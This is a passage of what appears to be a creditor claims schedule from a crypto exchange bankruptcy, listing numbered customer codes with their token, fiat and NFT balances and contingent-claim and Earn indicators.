| 07370133 | | CUSDT[24.5211777], DOGE[0], USD[0.00] | | |
| 07370136 | | USD[10.00] | | |
| 07370138 | | CUSDT[1], USD[0.00] | | |
| 07370139 | | DOGE[141.77262279], USD[0.00] | | |
| 07370140 | | BRZ[7.68457925], CUSDT[58.18324262], DOGE[1], GRT[2.10292152], KSHIB[14.51164364], SHIB[14504.02418414], USD[0.00], USDT[1.12036979] | Yes | |
| 07370141 | | USD[10.00] | | |
| 07370142 | | DOGE[550.69918261], USD[10.00] | | |
| 07370143 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07370144 | | DOGE[2], USD[0.01] | | |
| 07370145 | | BTC[.00073834], CUSDT[1346.85178179], DOGE[1715.64902659], GRT[1], LINK[2.33982375], LTC[.64629377], SHIB[3952733.14738], TRX[776.51269044], USD[0.09], USDT[19.89013465] | | |
| 07370147 | | USD[10.00] | | |
| 07370148 | | BTC[0], USD[0.01] | | |
| 07370149 | | BRZ[1], CUSDT[4], DOGE[1235.95872253], TRX[65.03008063], USD[0.00] | | |
| 07370150 | | CUSDT[2], DOGE[114.45397913], SHIB[371206.24870081], SOL[.31856563], TRX[1], USD[0.18] | | |
| 07370151 | | BRZ[2], CUSDT[10], DOGE[1.02149274], ETH[0], GRT[0], SHIB[8], SOL[0], TRX[2], USD[0.00], USDT[0] | | |
| 07370152 | | CUSDT[6], TRX[1], USD[0.00] | | |
| 07370153 | | BRZ[1], DOGE[.00625641], TRX[1], USD[0.00] | | |
| 07370154 | | CUSDT[1], LINK[.28663628], USD[0.00] | | |
| 07370155 | | BAT[1.01655549], DOGE[151.02378811], TRX[1], USD[0.00], USDT[1.08644713] | Yes | |
| 07370156 | | SOL[1], TRX[2], USD[0.00], USDT[0] | | |
| 07370157 | | DOGE[137.70237257], USD[0.00] | | |
| 07370158 | | USD[10.00] | | |
| 07370159 | | CUSDT[3], ETH[.00000001], TRX[0], USD[0.00] | | |
| 07370160 | | USD[10.00] | | |
| 07370161 | | USD[10.00] | | |
| 07370162 | | USD[10.00] | | |
| 07370163 | | USD[10.00] | | |
| 07370164 | | BRZ[1], CUSDT[1178.97993268], TRX[180.64035282], USD[0.01] | | |
| 07370165 | | USD[10.00] | | |
| 07370166 | | BRZ[1], CUSDT[6], DOGE[1], TRX[439.20585724], USD[0.00] | | |
| 07370167 | | USD[10.00] | | |
| 07370168 | | TRX[185.13413616], USD[0.00] | | |
| 07370169 | | USD[10.00] | | |
| 07370170 | | BTC[.00069147], ETH[.00000001], LTC[.00616], PAXG[.0000276], SOL[.002], SUSHI[.336], UNI[.0276], USD[3.30], USDT[.00568689], YFI[.000332] | | |
| 07370171 | | USD[10.00] | | |
| 07370172 | | DOGE[1], USD[0.00] | | |
| 07370173 | | DOGE[458.83710079], TRX[101.05015361], USD[0.00] | | |
| 07370174 | | BTC[0], USD[19.15] | | |
| 07370175 | | USD[0.00] | | |
| 07370177 | | USD[10.00] | | |
| 07370178 | | USD[0.00] | | |
| 07370179 | | DOGE[979.79552715], USD[0.00] | | |
| 07370180 | | ETH[.088], ETHW[.00050024], USD[0.96], USDT[0] | | |
| 07370181 | | DOGE[1], NFT (455300722697631346/Dragons #5)[1], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07370182 | | USD[10.00] | | |
| 07370183 | | USD[10.00] | | |
| 07370184 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370185 | | CUSDT[3], TRX[546.86650469], USD[0.01] | | |
| 07370186 | | USD[10.00] | | |
| 07370187 | | BTC[.00022559], CUSDT[18], DOGE[2299.02812702], ETH[.03304471], ETHW[.03304471], GRT[126.61280979], TRX[545.8010518], USD[0.00] | | |
| 07370189 | | USD[0.26] | | |
| 07370190 | | USD[10.00] | | |
| 07370191 | | USD[10.00] | | |
| 07370192 | | DOGE[3], USD[1.90] | | |
| 07370193 | | DOGE[1039.93672301], SOL[3.5994725], SUSHI[1.58567318], USD[10.00] | | |
| 07370194 | | CUSDT[1], USD[0.00] | | |
| 07370195 | | USD[10.00] | | |
| 07370196 | | BTC[0], DOGE[0], ETH[0], GRT[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000009] | | |
| 07370197 | | USD[0.01], USDT[0] | | |
| 07370198 | | BRZ[1], BTC[0], DOGE[4], GRT[0], USD[0.00] | | |
| 07370199 | | USD[10.00] | | |
| 07370200 | | BCH[2.3821962], DOGE[38616.45411749], ETH[2.25136338], ETHW[2.2504178], USD[0.00] | Yes | |
| 07370201 | | USD[10.00] | | |
| 07370203 | | CUSDT[4], DOGE[1], ETH[0], TRX[4], USD[0.01] | | |
| 07370204 | | TRX[1], USD[0.00] | | |
| 07370205 | | USD[10.00] | | |
| 07370206 | | BTC[0], TRX[1], USD[0.00], USDT[0] | | |
| 07370207 | | USD[10.00] | | |
| 07370208 | | BRZ[1], BTC[.00001453], CUSDT[85.46929846], DOGE[109.50941852], TRX[865.29858228], USD[0.01] | Yes | |
| 07370209 | | BTC[0.00049227], ETH[0], ETHW[0], USD[3.48], USDT[0] | | |
| 07370210 | | BRZ[2], CUSDT[4], DOGE[4.05213569], TRX[1], USD[0.00] | Yes | |
| 07370211 | | USD[10.00] | | |
| 07370212 | | CUSDT[6], DOGE[55.39654051], USD[0.00] | | |
| 07370215 | | USD[10.00] | | |
| 07370216 | | BAT[10.28325461], BTC[.00115845], CUSDT[3], DOGE[5591.22456166], ETH[.03053467], ETHW[.03015163], TRX[2], USD[0.00] | Yes | |
| 07370217 | | GRT[4.96287771], USD[0.00] | | |
| 07370218 | | USD[10.00] | | |
| 07370220 | | USD[10.00] | | |
| 07370221 | | USD[0.05] | | |
| 07370222 | | CUSDT[1], DOGE[1], SOL[0], TRX[4], USD[0.00], USDT[2] | | |
| 07370223 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07370224 | | AUD[0.00], CUSDT[2], DOGE[1], USD[10.00] | | |
| 07370225 | | DOGE[25.11273924], USD[0.00] | | |
| 07370226 | | CUSDT[2], DOGE[2], ETH[0], MATIC[0], SOL[0], TRX[0.00003552], USD[0.13] | Yes | |
| 07370227 | | SUSHI[1.00017735], USD[0.00] | | |
| 07370228 | | USD[10.00] | | |
| 07370229 | | USD[10.00] | | |
| 07370230 | | USD[10.00] | | |
| 07370231 | | BRZ[1], CUSDT[2], USD[0.41] | | |
| 07370232 | | CUSDT[2], DOGE[89.67747686], TRX[1], USD[0.01] | | |
| 07370233 | | USD[10.00] | | |
| 07370234 | | BRZ[1], DOGE[1504.79231759], TRX[3], USD[0.00] | | |
| 07370235 | | DOGE[122.5064276], USD[0.00] | | |
| 07370236 | | USD[10.00] | | |
| 07370237 | | USD[10.00] | | |
| 07370239 | | BTC[0.00005923], ETH[.000756], ETHW[.000756], USD[0.00] | | |
| 07370240 | | USD[10.00] | | |
| 07370241 | | USD[10.00] | | |
| 07370243 | | BTC[0], USD[0.01] | | |
| 07370244 | | SUSHI[.62606263], USD[0.00] | | |
| 07370246 | | USD[10.00] | | |
| 07370247 | | USD[10.00] | | |
| 07370248 | | CUSDT[1], DOGE[0], KSHIB[0], LINK[0], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07370249 | | USD[10.00] | | |
| 07370250 | | USD[11.08] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370251 | | USD[10.00] | | |
| 07370252 | | CUSDT[1], DOGE[10023.91809618], USD[10.00] | | |
| 07370253 | | BAT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07370254 | | BAT[0], DAI[0], SHIB[2], USD[0.00] | Yes | |
| 07370255 | | CUSDT[5], DOGE[370.47602741], SHIB[477058.77057596], TRX[1], USD[0.00] | Yes | |
| 07370256 | | MATIC[6.62432622], SHIB[3], USD[0.00] | Yes | |
| 07370257 | | USD[10.00] | | |
| 07370259 | | TRX[3], USD[0.11] | | |
| 07370260 | | USD[0.01] | | |
| 07370263 | | BAT[1], CUSDT[4], ETH[.00000001], ETHW[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07370264 | | USD[10.00] | | |
| 07370265 | | SUSHI[.99905], USD[74.35] | | |
| 07370266 | | CAD[0.00], CUSDT[6], DOGE[76.79576526], GRT[0], LTC[0], USD[0.65] | | |
| 07370267 | | BRZ[1], DOGE[.08812797], TRX[1], USD[0.01], USDT[1] | | |
| 07370268 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07370269 | | USD[52.07] | Yes | |
| 07370270 | | USD[0.00] | | |
| 07370271 | | BRZ[0], CUSDT[3], DOGE[0], GRT[0], SOL[0], TRX[2], USD[0.00] | | |
| 07370273 | | USD[0.00] | | |
| 07370275 | | USD[10.00] | | |
| 07370276 | | USD[10.00] | | |
| 07370277 | | BAT[1], CUSDT[2], GRT[1], USD[0.00] | | |
| 07370279 | | BRZ[0.00042088], BTC[0], DOGE[0], USD[0.00] | | |
| 07370280 | | BAT[0], GRT[0], SOL[0], TRX[.00986584], USD[0.01] | | |
| 07370282 | | BRZ[51.30757816], CUSDT[491.29141104], DOGE[438.68052528], KSHIB[398.04522642], SHIB[2467955.08498931], USD[0.00] | Yes | |
| 07370283 | | BTC[0], SOL[0] | | |
| 07370284 | | USD[10.00] | | |
| 07370285 | | USD[11.00] | Yes | |
| 07370286 | | USD[10.00] | | |
| 07370288 | | USD[10.00] | | |
| 07370290 | | BRZ[1], CUSDT[4], GRT[1], TRX[.00076584], USD[0.00] | | |
| 07370291 | | BAT[1], DOGE[30088.6812639], TRX[4], USD[0.15] | | |
| 07370292 | | DOGE[3055.71480219], SHIB[6.98711535], TRX[3], USD[0.19] | Yes | |
| 07370293 | | USD[10.00] | | |
| 07370294 | | USD[10.00] | | |
| 07370295 | | USD[0.00] | | |
| 07370297 | | DOGE[143.54155306], USD[0.00] | Yes | |
| 07370298 | | BRZ[1], CUSDT[3], DOGE[4], USD[0.00] | | |
| 07370299 | | USD[10.00] | | |
| 07370300 | | BRZ[1], CUSDT[2], DOGE[3085.76643277], GRT[9.87955781], TRX[1], USD[0.00] | | |
| 07370301 | | DOGE[0], ETH[0], GRT[0], TRX[1], USD[0.00] | | |
| 07370302 | | CUSDT[2], DOGE[95.92847086], TRX[1], USD[0.00] | | |
| 07370303 | | BTC[.00038334], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07370304 | | USD[10.00] | | |
| 07370305 | | CUSDT[2049.66580413], DOGE[857.65596314], GRT[8.83772052], KSHIB[362.54030541], SHIB[393598.20787425], TRX[723.06818485], USD[51.17] | Yes | |
| 07370306 | | BAT[0.00000001], BCH[0.00000001], BTC[0.00000001], DOGE[6.00011983], GRT[0.00012650], TRX[0.00005006], USD[0.11] | | |
| 07370307 | | BTC[.00549939], CUSDT[2], DOGE[501.64388811], SUSHI[.42428023], USD[0.01] | | |
| 07370308 | | BTC[0], CUSDT[8], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07370310 | | USD[10.00] | | |
| 07370311 | | USD[10.00] | | |
| 07370312 | | CUSDT[1], USD[0.01] | | |
| 07370313 | | USD[10.00] | | |
| 07370314 | | BRZ[0], BTC[0], DOGE[2], ETH[0], ETHW[0], GRT[1], LINK[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07370315 | | USD[10.00] | | |
| 07370316 | | BTC[.00053265], CUSDT[2], DOGE[1314.8861405], TRX[1], USD[0.00] | Yes | |
| 07370317 | | AAVE[1.40814235], BCH[.03936027], BRZ[106.28905406], CUSDT[560.81856115], DOGE[156.18232114], ETHW[5.0430315], KSHIB[187.99218704], LTC[1.41534844], MKR[.03741555], SHIB[18], SUSHI[14.13771995], TRX[1290.63717591], UNI[7.36704657], USD[0.00], USDT[88.7817756], YFI[.00677583] | Yes | |
| 07370318 | | USD[10.00] | | |
| 07370319 | | CUSDT[2], DOGE[2], LINK[.10939533], LTC[.11209914], SHIB[5692278.17902345], TRX[.00004758], USD[0.00], USDT[0.00020581] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370320 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[9.19992570], SOL[0], USD[0.00] | | |
| 07370321 | | USD[10.00] | | |
| 07370322 | | SOL[.069] | | |
| 07370323 | | USD[10.00] | | |
| 07370324 | | CUSDT[1], USD[10.00] | | |
| 07370325 | | BRZ[1], CUSDT[4], DOGE[2141.69882757], USD[0.00] | | |
| 07370326 | | BTC[.00017788], USD[0.00] | | |
| 07370327 | | USD[10.00] | | |
| 07370328 | | USD[10.00] | | |
| 07370331 | | USD[0.01], USDT[0] | Yes | |
| 07370332 | | DOGE[.00002155], USD[0.00] | | |
| 07370334 | | USD[10.00] | | |
| 07370335 | | USD[10.00] | | |
| 07370336 | | USD[10.00] | | |
| 07370337 | | USD[10.00] | | |
| 07370339 | | BTC[.00000123], USD[0.01] | | |
| 07370342 | | SHIB[1900000], TRX[1147.663], USD[0.10] | | |
| 07370343 | | BAT[1], BRZ[1], BTC[0], CUSDT[3], DOGE[1.01343445], GRT[1], LINK[1], SOL[741.75885888], TRX[3], USD[0.00], USDT[2] | | |
| 07370346 | | USD[10.00] | | |
| 07370347 | | USD[0.01] | | |
| 07370348 | | DAI[.38672744], SUSHI[6.06964006] | | |
| 07370349 | | LTC[0], USD[0.01], USDT[0] | | |
| 07370351 | | GRT[.794], SUSHI[.436], USD[1.40] | | |
| 07370353 | | USD[10.00] | | |
| 07370354 | | CUSDT[1.23578846], USD[0.00] | | |
| 07370356 | | DOGE[196.02600402], USD[0.00] | | |
| 07370357 | | USD[0.00] | | |
| 07370358 | | USD[10.00] | | |
| 07370359 | | CUSDT[4], DOGE[.00002191], TRX[3], USD[0.01] | | |
| 07370361 | | GRT[96.22340457], USD[0.00] | | |
| 07370362 | | MATIC[.3], NFT (362109272292854340/France Ticket Stub #21)[1], NFT (377223608376876302/Series 1: Wizards #374i)[1], NFT (420898276541017790/Entrance Voucher #1448)[1], NFT (424584473639197463/The Reflection of Love #5703)[1], NFT (450151152370087186/Medallion of Memoria)[1], NFT (514312987507613754/Medallion of Memoria)[1], NFT (549895035244895493/Barcelona Ticket Stub #827)[1], NFT (572922238785298802/Humpty Dumpty #623)[1], TRX[.0001169], USDT[.01028199] | Yes | |
| 07370363 | | USD[0.00] | | |
| 07370364 | | CUSDT[11], GRT[1.00166348], SOL[.13491149], TRX[1], USD[0.00] | Yes | |
| 07370365 | | USD[10.00] | | |
| 07370366 | | BRZ[2], CUSDT[3], DOGE[1], GRT[192.57352522], TRX[1], USD[181.55] | | |
| 07370367 | | GRT[0], SUSHI[0], USD[0.00] | | |
| 07370368 | | USD[10.00] | | |
| 07370369 | | USD[10.00] | | |
| 07370371 | | USD[10.00], YFI[.00087847] | | |
| 07370372 | | BRZ[1], BTC[0.36897422], DOGE[0], ETH[.00003003], ETHW[3.40094609], GRT[0], USD[4492.18], USDT[0] | Yes | |
| 07370373 | | DOGE[118.58377743], USD[0.04] | | |
| 07370374 | | USD[10.00] | | |
| 07370375 | | CUSDT[16], DOGE[114.60443609], MATIC[144.89207804], SHIB[38826211.16916639], TRX[2], USD[0.00] | Yes | |
| 07370377 | | BRZ[1], CUSDT[5], DOGE[2056.38667348], SHIB[1324152.54237288], SOL[1.13475385], TRX[1], USD[91.00] | | |
| 07370378 | | USD[10.00] | | |
| 07370379 | | USD[10.00] | | |
| 07370380 | | DOGE[31.0709459], USD[0.00] | | |
| 07370381 | | NFT (337389286075873640/Bahrain Ticket Stub #2223)[1], USD[0.78] | | |
| 07370382 | | USD[10.00] | | |
| 07370383 | | USD[10.00] | | |
| 07370385 | | USD[10.00] | | |
| 07370387 | | USD[10.00] | | |
| 07370388 | | USD[0.00] | | |
| 07370389 | | CUSDT[1], DOGE[2], LTC[0], USD[0.01], USDT[0] | | |
| 07370391 | | BAT[1.0165555], BRZ[1], CUSDT[2], TRX[2], USD[0.00], USDT[1.10995459] | Yes | |
| 07370392 | | ETH[.13795455], ETHW[.13795455], USD[517.14] | | |
| 07370393 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370394 | | USD[10.00] | | |
| 07370395 | | LINK[.35668273], USD[0.00] | | |
| 07370396 | | BTC[0], CUSDT[1], USD[0.00], USDT[0.00008533] | | |
| 07370397 | | USD[10.00] | | |
| 07370398 | | USD[10.00] | | |
| 07370399 | | ALGO[4.07030803], DOGE[125.89379056], USD[0.00] | Yes | |
| 07370400 | | USD[10.00] | | |
| 07370402 | | BAT[.00367683], BRZ[1], CUSDT[.02680286], DOGE[1.00469881], ETH[.00093216], ETHW[.00023349], GRT[.00185375], SHIB[19], SUSHI[.00017744], UNI[.00006924], USD[0.00] | Yes | |
| 07370403 | | CUSDT[1], DOGE[1], LTC[1.51913539], USD[0.12] | Yes | |
| 07370404 | | CUSDT[5], DOGE[65.31995658], TRX[1], USD[0.00] | | |
| 07370405 | | BRZ[3], CUSDT[4], DOGE[2669.92080954], TRX[2], USD[0.00] | | |
| 07370406 | | USD[0.01], USDT[0] | Yes | |
| 07370407 | | USD[10.00] | | |
| 07370408 | | USD[10.00] | | |
| 07370409 | | BTC[0], CUSDT[3], DOGE[2], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07370410 | | BAT[0], DOGE[1], SUSHI[0], USD[0.00] | | |
| 07370411 | | USD[10.00] | | |
| 07370412 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07370413 | | USD[10.00] | | |
| 07370414 | | DOGE[2], USD[0.00] | | |
| 07370415 | | USD[10.00] | | |
| 07370416 | | USD[10.00] | | |
| 07370417 | | USD[10.00] | | |
| 07370418 | | USD[10.00] | | |
| 07370420 | | ETH[.056943], ETHW[.056943], USD[0.00] | | |
| 07370422 | | USD[2.56] | | |
| 07370423 | | BCH[.01840169], CUSDT[1], DOGE[5509.06839217], TRX[1], USD[0.00] | Yes | |
| 07370424 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SHIB[759.80372574], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07370425 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[1], TRX[1], USD[0.00] | | |
| 07370426 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07370427 | | CUSDT[1], DOGE[.00003203], USD[0.01] | | |
| 07370428 | | DOGE[18.99472976], TRX[1], USD[0.00] | | |
| 07370429 | | USD[10.00] | | |
| 07370430 | | USD[10.00] | | |
| 07370431 | | DOGE[2], LINK[0], TRX[1], USD[0.00], USDT[1] | | |
| 07370432 | | USDT[1] | | |
| 07370433 | | USD[10.00] | | |
| 07370434 | | USD[10.00] | | |
| 07370435 | | CUSDT[1], DOGE[0], TRX[1], USD[0.01] | | |
| 07370436 | | USD[10.00] | | |
| 07370438 | | DOGE[37.99588139], USD[0.00] | | |
| 07370439 | | USD[10.00] | | |
| 07370440 | | BAT[1], BRZ[2], CUSDT[4], DOGE[2], TRX[2], USD[1.00], USDT[0] | | |
| 07370441 | | DOGE[170.44988713], USD[0.00] | | |
| 07370442 | | USD[10.00] | | |
| 07370444 | | DOGE[978.94553486], USD[0.00] | | |
| 07370445 | | BRZ[1], CUSDT[1], DOGE[.00039241], USD[36.41] | | |
| 07370446 | | USD[10.00] | | |
| 07370447 | | USD[48.46] | | |
| 07370448 | | ETH[.00523785], ETHW[.00523785], USD[0.00] | | |
| 07370449 | | USD[10.00] | | |
| 07370450 | | USD[10.00] | | |
| 07370451 | | CUSDT[1], SHIB[2193659.67414586], TRX[1], USD[162.69] | Yes | |
| 07370452 | | CUSDT[1], USD[0.00] | Yes | |
| 07370453 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07370454 | | DOGE[1108.92555], SHIB[24200000], SOL[479.05985], SUSHI[9.4639], USD[2.39] | | |
| 07370456 | | CUSDT[3], DAI[12.0076261], DOGE[3.9174512], LINK[.98155336], TRX[9.18437599], UNI[1.12351569], USD[0.00], USDT[1.0189846] | | |
| 07370457 | | USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370458 | | BTC[0], DOGE[1], TRX[.0000406], USD[0.00] | | |
| 07370459 | | CUSDT[6], DOGE[82.41075646], TRX[1], USD[0.00] | | |
| 07370461 | | USD[10.00] | | |
| 07370462 | | USD[10.00] | | |
| 07370464 | | SHIB[351420.94475594], USD[0.00] | Yes | |
| 07370465 | | USD[10.00] | | |
| 07370467 | | DOGE[1], USD[0.00] | | |
| 07370468 | | CUSDT[1], ETH[.1593068], ETHW[.1587587], SHIB[52708414.45636401], TRX[1], USD[2.95] | Yes | |
| 07370469 | | SHIB[0], USD[0.00] | Yes | |
| 07370470 | | DOGE[0], ETH[0], SHIB[17020.08339042], TRX[0], USD[0.01] | Yes | |
| 07370471 | | USD[10.00] | | |
| 07370472 | | BTC[0], SUSHI[.2] | | |
| 07370473 | | USD[10.90] | Yes | |
| 07370474 | | USD[10.00] | | |
| 07370475 | Contingent, Disputed | ETH[0], USD[0.00] | Yes | |
| 07370476 | | SOL[.00000001], USD[0.00] | | |
| 07370477 | | USD[10.00] | | |
| 07370478 | | USD[10.00] | | |
| 07370479 | | ETH[.00050234], ETHW[.00050234], SOL[0.00880000], TRX[.011686], USD[0.00], USDT[0.00677343] | | |
| 07370480 | | DOGE[1], USD[0.91] | | |
| 07370481 | | USD[10.00] | | |
| 07370482 | | USD[0.00] | | |
| 07370484 | | NFT (394658424628962187/Entrance Voucher #3764)[1], SOL[0], USD[31935.83], USDT[0] | | |
| 07370486 | | USD[10.00] | | |
| 07370487 | | TRX[252.693607] | | |
| 07370488 | | USD[10.00] | | |
| 07370489 | | DOGE[6.04942441], USD[0.01] | | |
| 07370490 | | BRZ[1], CUSDT[2], TRX[3], USD[0.01] | Yes | |
| 07370492 | | BTC[.007992], DOGE[20.502], ETH[.539209], ETHW[.539209], GRT[.897], KSHIB[19.98], MATIC[19.98], SOL[20.79918], TRX[99.9], USD[0.32] | | |
| 07370494 | | BTC[0], CUSDT[1], ETH[0.01280411], ETHW[0.01280411], NFT (499913462182142869/Sigma Shark #4244)[1], SOL[1.75351232], TRX[1], USD[0.00] | | |
| 07370495 | | USD[10.00] | | |
| 07370496 | | CUSDT[1], USD[0.00] | | |
| 07370497 | | SUSHI[124.70141469], TRX[1], USD[10.00], USDT[1] | | |
| 07370499 | | USD[0.00] | | |
| 07370500 | | BTC[.00010582], ETH[.00278935], ETHW[.00278935], USD[10.00] | | |
| 07370501 | | BAT[4.41579931], BRZ[4], BTC[0], CUSDT[6], DOGE[5.06467585], GRT[0.33778064], TRX[2.63297035], UNI[.00060212], USD[0.01], USDT[3.31184937] | Yes | |
| 07370503 | | USD[10.00] | | |
| 07370504 | | NFT (541708196897372026/Microphone #310)[1] | | |
| 07370505 | | USD[0.00] | | |
| 07370507 | | USD[10.00] | | |
| 07370508 | | BRZ[1], CUSDT[3], DOGE[738.58517489], TRX[2569.54256564], USD[0.48] | | |
| 07370509 | | BTC[.00052268], CUSDT[13], DOGE[931.86531097], ETH[.0302545], ETHW[.0302545], LINK[1.23755597], TRX[364.65735605], USD[0.89] | | |
| 07370510 | | USD[10.00] | | |
| 07370511 | | BAT[1], BRZ[1], DOGE[.00002009], ETH[2.43333557], ETHW[2.43333557], GRT[1], MATIC[1], SHIB[1], TRX[1.00004032], USD[0.60] | | |
| 07370513 | | BTC[0], ETHW[3.85801589], LINK[166.62196349], SHIB[1], USD[0.81] | Yes | |
| 07370514 | | USD[10.00] | | |
| 07370515 | | USD[10.00] | | |
| 07370516 | | BTC[.00020786], CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07370518 | | BAT[.00212094], BRZ[3], CUSDT[8], DOGE[1], GRT[2], SHIB[1927896.66473877], TRX[.09441878], USD[1.72], USDT[2] | | |
| 07370519 | | CUSDT[3], TRX[2], USD[0.01] | | |
| 07370520 | | BRZ[1], CUSDT[1], SUSHI[73.22248093], USD[0.00] | Yes | |
| 07370523 | | SHIB[144305.72063209], USD[0.00] | Yes | |
| 07370524 | | USD[10.00] | | |
| 07370526 | | USD[10.00] | | |
| 07370527 | | CUSDT[1], USD[16.11] | | |
| 07370528 | | TRX[0], USD[0.00], USDT[0] | | |
| 07370530 | | USD[10.00] | | |
| 07370531 | | TRX[74.94203046], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370532 | | BRZ[14.41167138], CUSDT[30], DOGE[142.8523937], GRT[2.04252786], LINK[.0000557], MKR[.00000749], SHIB[1], TRX[3], USD[0.00], USDT[4.40366480] | Yes | |
| 07370533 | | SOL[.05376473], USD[0.00] | Yes | |
| 07370534 | | CUSDT[6], TRX[1], USD[0.00] | Yes | |
| 07370535 | | USD[10.00] | | |
| 07370536 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07370537 | | USD[10.00] | | |
| 07370538 | | BRZ[1], CUSDT[4], DOGE[2], TRX[5], USD[0.01] | | |
| 07370539 | | CUSDT[2], USD[0.00] | | |
| 07370540 | | USD[0.00] | | |
| 07370541 | | USD[10.00] | | |
| 07370542 | | USD[10.00] | | |
| 07370543 | | USD[10.00] | | |
| 07370544 | | BTC[0], USD[0.00] | | |
| 07370545 | | USD[10.00] | | |
| 07370546 | | CUSDT[1], USD[0.01] | | |
| 07370547 | | USD[10.00] | | |
| 07370548 | | CUSDT[1], USD[0.00] | Yes | |
| 07370549 | | BAT[33.54452429], BTC[.00087457], CUSDT[1886.90010297], DAI[34.7002189], DOGE[2670.82100621], GRT[31.29854645], LINK[1.03841505], LTC[.25508332], SOL[2.20354989], SUSHI[2.25004021], TRX[865.29134855], UNI[.25959621], USDI-20.00], USDT[4.97352785] | | |
| 07370550 | | BAT[1], BRZ[1], CUSDT[8.00000134], DOGE[196.00131913], TRX[63.67869116], USD[0.61] | | |
| 07370551 | | USD[0.00] | | |
| 07370552 | | USD[10.71] | Yes | |
| 07370553 | | USD[10.00] | | |
| 07370554 | | CUSDT[1], DOGE[.83105511], SHIB[1], USD[0.00] | | |
| 07370555 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07370556 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07370557 | | AAVE[0.00001008], BAT[2], BF_POINT[400], BRZ[28.20655024], BTC[0], CUSDT[38], DOGE[103.72654763], ETH[0], ETHW[3.79692440], GRT[8.0162435], KSHIB[0], LTC[0.08418218], MATIC[0.00009293], MKR[0], PAXG[0], SHIB[111], SOL[0], TRX[43.26495609], UNI[0], USD[0.00], USDT[23.22915589], YFI[0] | Yes | |
| 07370558 | | CUSDT[2], DOGE[8], TRX[1], USD[0.00] | | |
| 07370563 | | USD[10.96] | Yes | |
| 07370564 | | BTC[0.00003969], CUSDT[4], USD[0.00] | Yes | |
| 07370565 | | DOGE[1], GRT[3.01595483], SHIB[4], USD[0.01] | Yes | |
| 07370566 | | BRZ[4], CUSDT[96], DOGE[56850.5316006], TRX[8], USD[0.50] | | |
| 07370568 | | BRZ[4], CUSDT[21.0000273], DOGE[1], SHIB[1444991.07716675], USD[0.00], USDT[0.00000001] | Yes | |
| 07370569 | | BAT[1], BTC[.00000013], NFT (547983487925375456/FTX - Off The Grid Miami #4210)[1], USD[0.00], USDT[1] | | |
| 07370570 | | BTC[0], DOGE[.52], ETH[0], ETHW[0], GRT[0.84088477], LTC[0], MATIC[9.87], SHIB[27200077.4], TRX[.228], UNI[.064], USD[136.27] | | |
| 07370571 | Contingent, Disputed | BAT[0], BCH[0], BRZ[0], BTC[0], CHF[0.00], DOGE[0], ETH[0.00000001], ETHW[0], EUR[0.00], GBP[0.00], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[1.79], USDT[0] | Yes | |
| 07370572 | | USD[10.00] | | |
| 07370573 | | DOGE[135.37181629], USD[0.00] | | |
| 07370575 | | USD[10.00] | | |
| 07370576 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07370577 | | BTC[.00008142], DAI[0], ETH[0], LTC[0], MATIC[.786], SOL[.00000001], USD[0.35], USDT[0] | | |
| 07370578 | | USD[10.00] | | |
| 07370580 | | USD[10.00] | | |
| 07370581 | | USD[10.00] | | |
| 07370582 | | USD[0.00] | | |
| 07370583 | | USD[10.00] | | |
| 07370584 | | USD[10.00] | | |
| 07370585 | | BRZ[1], USD[0.00] | Yes | |
| 07370586 | | BRZ[1], CUSDT[16], GRT[2.01947315], LINK[1.00973659], TRX[6], USD[0.95], USDT[0.00555873] | | |
| 07370588 | | USD[10.00] | | |
| 07370591 | | BAT[14.68064502], TRX[146.31476989], USD[20.00] | | |
| 07370592 | | BTC[0], CUSDT[1], ETH[0], GRT[0], LINK[0], USD[0.00] | | |
| 07370593 | | USD[10.00] | | |
| 07370594 | | USD[10.00] | | |
